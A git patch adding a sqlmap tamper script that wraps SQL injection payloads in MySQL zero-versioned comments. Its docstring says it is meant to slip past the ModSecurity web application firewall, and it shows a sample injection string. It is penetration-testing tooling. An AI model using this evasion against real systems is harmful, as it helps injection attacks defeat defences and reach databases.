From 38e2d0896b7ba73f531cd9615fa61affa92776f1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 25 Oct 2011 13:40:32 +0000
Subject: [PATCH] new tamper script

---
 tamper/modsecurityzeroversioned.py | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 tamper/modsecurityzeroversioned.py

diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
new file mode 100644
index 000000000..93a73c913
--- /dev/null
+++ b/tamper/modsecurityzeroversioned.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Embraces complete query with zero-versioned comment
+
+    Example:
+        * Input: 1 AND 2>1--
+        * Output: 1 /*!00000AND 2>1*/--
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0
+
+    Notes:
+        * Useful to bypass ModSecurity WAF/IDS
+    """
+
+    retVal = payload
+
+    if payload:
+        postfix = ''
+        for comment in ('#', '--', '/*'):
+            if comment in payload:
+                postfix = payload[payload.find(comment):]
+                payload = payload[:payload.find(comment)]
+                break
+        if ' ' in payload:
+            retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
+
+    return retVal